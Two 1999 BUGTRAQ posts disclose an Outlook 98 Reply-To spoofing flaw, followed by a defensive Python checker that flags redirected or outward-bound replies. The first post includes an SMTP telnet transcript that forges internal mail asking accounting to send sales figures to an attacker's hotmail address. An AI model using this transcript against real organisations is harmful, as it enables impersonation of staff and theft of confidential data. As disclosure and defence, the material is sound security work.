- Date: Tue, 20 Apr 1999 15:10:05 -0700
- From: Nate Lawson <nate@root.org>
- To: BUGTRAQ@netspace.org
- Subject: Outlook 98 allows spoofing internal users
-
- Problem: Outlook uses a sender's Reply-To address silently, allowing
- a user to inadvertently send data to an Internet mail account
- when intending to reply to an internal, trusted user.
-
- Impact: Anyone on the Internet can spoof a trusted internal Exchange user
- and get replies sent back to themselves without the user knowing they
- weren't responding to another internal user.
-
- How to reproduce:
-
- 1. Spoof mail as an internal user with a Reply-To address claiming to be
- an internal user, but an address of an Internet account, say hotmail.
- 2. Go into Outlook and read the mail. The mail looks like it was internally
- generated but viewing the full Internet headers under View->Options
- shows the bogus Reply-To header.
- 3. Hit Reply in Outlook. The To: field looks like it's going to a valid
- internal user, but right clicking on it and choosing Properties shows
- that the internal user it is sending the reply to is actually an Internet
- address.
- 4. Enter some text and hit Send. Observe that the mail went to the attacker's
- account, not the internal one.
-
- A quick script:
-
- {root 5:00pm} ~> telnet mail.example.com 25
- Trying 10.20.2.5...
- Connected to mail.example.com.
- Escape character is '^]'.
- 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
- helo losebag
- 250 OK
- mail from:<>
- 250 OK - mail from <>
- rcpt to:<accounting@example.com>
- 250 OK - Recipient <accounting@example.com>
- data
- 354 Send data. End with CRLF.CRLF
- From: Nate Lawson
- To: Accounting
- Reply To: Nate Lawson<intruder@hotmail.com>
- Subject: important!
-
- Please reply with the latest copy of our sales figures!
-
- Thanks,
- Nate
- .
- 250 OK
- quit
- 221 closing connection
- Connection closed by foreign host.
-
- Now, a reply to the email will go not to the trusted internal user Nate
- Lawson <nlawson@example.com> but to the attacker, <intruder@hotmail.com>.
- Worse, the user sees no indication that the mail is outward-bound! The
- To: field on the reply simply shows "Nate Lawson", a valid internal user.
-
- Affected programs: Only tested on Outlook 98
-
- Known use of this bug to get confidential information: none yet
-
- Suggested Fix: always show the full email address of any recipient that is
- not local (i.e. username@example.com would be hidden but any instance of
- user@hotmail.com would be shown)
-
- Microsoft has been notified, but claimed this was a weakness in SMTP and
- would not be fixed until a secure successor to SMTP is implemented. They
- obviously missed the point -- the error is not in that mail can be forged,
- but that Outlook allows a user to respond to a message that looks local
- and legitimate, but is actually destined for an outside address.
-
- -Nate
-
- -----------------------------------------------------------------------
-
- Date: Sun, 25 Apr 1999 18:36:11 +0200
- From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
- To: BUGTRAQ@netspace.org
- Subject: Re: Outlook 98 allows spoofing internal users
-
- On Tue, Apr 20, 1999 at 03:10:05PM -0700, Nate Lawson wrote:
- >
- > Suggested Fix: always show the full email address of any recipient that is
- > not local (i.e. username@example.com would be hidden but any instance of
- > user@hotmail.com would be shown)
-
- Yeah, like: I am user@aol.com and I'd like outlook to hide evilhacker@aol.com.
-
- Outlook should not be hiding anything..
-
- Greetz, Peter
- --
- | 'He broke my heart,  | Peter van Dijk                              |
- |  I broke his neck'   | peter@attic.vuurwerk.nl                     |
- | nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl        |
- |                      | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
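An added example (not from either poster) of the check a mail client could run before a reply is sent: it resolves the address a Reply would actually use, flags a Reply-To that redirects away from the From address, flags a target outside the local domain, and always renders the full address rather than the display name alone, which also covers the same-domain case Peter raises. The sample message and the `example.com` local domain are constructed for the demo.

```python
import email
from email.utils import parseaddr

# Constructed sample modelled on the transcript in the first post: the
# display name is an internal user, the Reply-To address is external.
SAMPLE = """From: Nate Lawson <nlawson@example.com>
To: Accounting <accounting@example.com>
Reply-To: Nate Lawson <intruder@hotmail.com>
Subject: important!

Please reply with the latest copy of our sales figures!
"""

def reply_target(raw):
    """Return (display_name, address, header) that a Reply would go to:
    Reply-To when present, otherwise From."""
    msg = email.message_from_string(raw)
    for header in ("Reply-To", "From"):
        value = msg.get(header)
        if value:
            name, addr = parseaddr(value)
            return name, addr.lower(), header
    return "", "", None

def check_reply(raw, local_domain):
    """Describe how the reply recipient should be shown and why it is risky."""
    msg = email.message_from_string(raw)
    name, addr, header = reply_target(raw)
    _, from_addr = parseaddr(msg.get("From", ""))
    warnings = []
    # Redirection: the reply will not go back to the apparent sender.
    if header == "Reply-To" and addr != from_addr.lower():
        warnings.append(f"Reply-To <{addr}> differs from From <{from_addr}>")
    # Outward-bound: the reply leaves the organisation.
    domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    if domain != local_domain.lower():
        warnings.append(f"reply leaves {local_domain}: '{name}' is really <{addr}>")
    # Never hide the address behind the display name, local or not.
    return {"shown_as": f"{name} <{addr}>", "warnings": warnings}

if __name__ == "__main__":
    for w in check_reply(SAMPLE, "example.com")["warnings"]:
        print("WARNING:", w)
```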